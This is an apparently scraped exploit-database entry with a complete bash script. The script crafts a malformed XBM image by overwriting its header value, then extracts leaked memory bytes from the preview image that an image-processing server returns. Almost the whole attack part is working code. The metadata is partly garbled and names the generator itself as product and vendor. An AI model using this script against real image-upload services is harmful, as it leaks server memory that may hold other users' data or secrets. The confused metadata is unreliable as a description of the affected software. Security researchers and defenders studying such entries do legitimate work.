POC Generator

vendor:

POC Generator

by:

Anonymous

7.5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: POC Generator

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2020

POC Generator is a bash script that can be used to generate a proof-of-concept (POC) for a buffer overflow vulnerability. It takes a width and height as parameters and creates an XBM file with the given dimensions. It then modifies the XBM file to contain a buffer overflow payload. If the 'minimal' parameter is given, the script will shrink the payload to the minimal body size.

Mitigation:

Input validation should be used to prevent buffer overflow attacks. The application should check the size of the input data before copying it to a buffer.

Source

Exploit-DB raw data:

#!/bin/bash

help() {
  echo "Usage poc generator: `basename $0` gen WIDTHxHEIGHT NAME.xbm [minimal]"
  echo "  Example gen: `basename $0` gen 512x512 poc.xbm"
  echo "Usage result recovery: `basename $0` recover SAVED_PREVIEW.png|jpeg|gif|etc"
  echo "  Example recovery: `basename $0` recover avatar.png"
}
if [ "$1" == "-h" ]; then
  help;
  exit 0
fi
if [ "$1" == "gen" ]; then
  echo "Generating..."
  convert -size $2 xc:white $3
  sed -i '0,/0x../s//0x80000001/' $3
  if [ "$4" == "minimal" ]; then
    echo "Shrink to minimal body size mode"
    sed -i 's/0x00//g' $3
    sed -i 's/,//g' $3
    sed -i '/^\s*$/d' $3
  fi
  echo "Done"
  exit 0
fi
if [ "$1" == "recover" ]; then
  convert $2 temp.xbm
  cat temp.xbm | grep -o '0x..' | xxd -r -p | strings -3
  rm temp.xbm
  exit 0
fi
help;